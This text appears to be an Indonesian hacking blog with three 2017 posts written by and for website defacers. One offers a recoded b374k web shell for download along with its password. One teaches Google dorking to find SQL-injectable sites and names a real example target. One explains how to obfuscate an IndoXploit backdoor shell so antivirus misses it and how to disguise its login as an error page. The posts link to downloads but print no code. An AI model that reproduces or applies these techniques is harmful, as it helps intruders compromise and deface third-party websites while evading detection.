Wednesday, January 11, 2017

Shell IDT

Kali ini saya meng recode shell b374k dengan logo IDT ( Indonesia Defacer Tersakiti ).
oke langsung saja.

Untuk tampilan menu login shell :
 


Dan tampilan menu shellnya :
 

Jika anda tertarik dengan shell ini, anda bisa mendownloadnya di sini :


pass : IDT

Bagi yang ingin request untuk recode shell untuk keprluan tim atau untuk diri anda sendiri bisa chat saya.

Saturday, January 7, 2017

Cara mengembangkan Dork

Mungkin seorang defacer sudah mengenal yang namanya dorking namun ada suatu ketika kita bingung stuck untuk mengembangkan sebuah dork.

terus bagaimana si mengembangkan sebuah dork ?
oke kali ini saya akan membahasnya.

seblom kita mengembamngkan sebuah dork alngkah baiknya kita mengerti apa yg di maksud :
  1. inurl / allinurl     = untuk mencari  string pada url.
  2. intext / allintext = untuk mencari nilai string ( text ) pada web.
  3. intitle / allintitle  = untuk mencari judul atau title pada website.
  4. site                  = untuk mencari pada web tertentu saja.
  5. ext                   = untuk mencari extensi pada web ( bagi yang ga tau  Ekstensi dari sebuah file adalah    karakter yang terletak setelah titik terakhir dalam sebuah nama file. seperti .html .php .asp .txt dll )
 contoh penggunaan :
  1. inurl / allinurl      = inurl:blabla/blabla/.../blabla
  2. intext / all intext  = intext:"blabla" atau intext:blabla
  3. intitle                = intitle:blabal
  4. site                   = site:id, site:com dll
  5. ext                   = ext:html, ext:php, ext:asp, dll

di sini saya akan menggunakan dork di atas.

saya akan mencoba untuk dork untuk SQLi Base64 yaitu :
inurl:product.php?id=MQ== 
hasil dari dork tersebut :
 
 kita bisa lihat hasil dari dork tersebut yaitu 51 hasil.
coba kita menggunakan allinurl : pada dork tersebut
 inurl:product.php?id=MQ==
hasli dari dork tesebut :
 kita bisa lihat ada perubahan hasil yang tadinya mendaptkan 51 hasil kini menjadi 48 hasilnya.
sekarang kita coba untuk memilih salah satu website dan kita akan mencoba mengembangkan dork dari url web tersebut.

di sini saya mencoba pilih website yang paling atas dan meliha - lihat isi website tersebut :
hal pertama yang saya lakukan ialah melihat masing - masing menu yang ada di web tersebut dan melihat urlnya sperti ini :

  
Kita bisa lihat website tersebut dan menampilkan sebuah url yang berbeda - beda
di sini saya akan mencoba mengambil url salah satu menu pada tersebut ialah :

http://www.chakshueng.com/product.php?id=MTE=

dan saya akan mengambil url web terbut untuk saya jadikan dork ( bukan webnya ).
urlnya ialah :
product.php?id=MTE=

dan kita lihat berpa hasil dari dork tersebut :
 


Disitu kita bisa lihat hasil dari dork url web tersbut ialah hanya menghasilkan 17 hasil saja :(
bagamina kita akan coba menghpus product.php? dan hanya menjadi inurl:id=MTE= kita lihat hasilnya.

 
 dan wow dorknya menghasilkan sekitar 3,030 hasil :D
banyak juga ya.

dan kita akan mencoba untuk menggunakan allinurl:id=MTE=
 
Kita bisa lihat hasilnya yaitu sekitar 3,040 hasil.

sudah paham ya kegunaan inurl dan allinurl ? pastinya sudah paham kan :D

oke saya kasih clue dan anda mudah - mudahan anda bisa mengerti.
  1.  Bisa menggunakan @copyright pada suatu website.
  2.  Bisa menggunakan Url  pada menu website.
  3.  Bisa menggunakan title pada menu login website.
  4.  Bisa menggunakan extensi pada Url website.
  5.  Bisa menggunakan  text - text tententu pada website.
oke sekian dan terimakasih sudah ingin membaca artikel saya semoba bermanfaat artikel yang saya buat ini.

NB : Segala kritik dan saran akan saya terima dengan senang hati, dan yang ingin bertanya - tanya silakan chat saya (fast respont ).

Friday, January 6, 2017

Cara Encode / Encrypt Shell Backdoor

Maaf seblomnya saya sudah lama tidak membuat artikel.
dan kali ini saya ingin membuat artikel tentang bagaimana cara Encode / Encrypt Shell Backdoor sehingga tak terdetksi sebagai virus.

di sini saya punya shell backdoor IndoXploit original dan hasil yang sudah saya recode.

oke di sini saya akan membandingkan Shell IndoXploit original dan yang telah di reode dan di Encrypt sama saya di total virus.
                                                            Shel IndoXploit_v2 ( original )

                           Shell IndoXploit_v2 ( yang telah di recode dan Encrypt / Encoding )

dari situ terlihat jelas bukan perbedaan yang paling mencolok dari beberpa software antivirus kalo shell backdoor IndoXploit ( original ) bakalan kedetksi sebagai firus di beberapa software antivirus.

Oke langsung saja.
  1. yang paling utama adalah shell backdoor kesayangan anda.
  2. Kunjungi webssite ini  fopo.com untuk Encode Shell anda.
caranya :
  1. Buka shell anda di Notepad++ seperti ini
   


    2. Kemudian Copy dan Paste script Shell anda di colum website yang sudah saya tunjukan seperti ini :
  

   Setelah Paste Script anda pada colum yang sebalah kiri nanti secara otomatis web tersebut akan langsung men Encode script anda. dan ini hasil dari Encodenya :
 

setelah mendapatkan shell yang telah di Encode anda tinggal copy paste saja.
dan anda bisa membandingkan shell anda yang seblom di encode dan sesudah di encode di website virus total.

Dan bagi anda yang tidak mau repot untuk menencode shell anda di sini saya menyediakan shell hasil recode saya yang original dan yang telah saya recode :

Untuk menu login shell sengaja saya buat seperti halaman error untuk mengecoh orang yang ingin mencoba akses shell anda.


Tampilan shell yang telah saya recode.
 

IndoXploit_v2 ( original )      Download
IndoXploit_v2 ( Encoding )  Download

Password : IndoXploit

Sekian Tutorial Cara Encrypt / Encode Shell Backdoor.
 
Cool Blue Outer Glow Pointer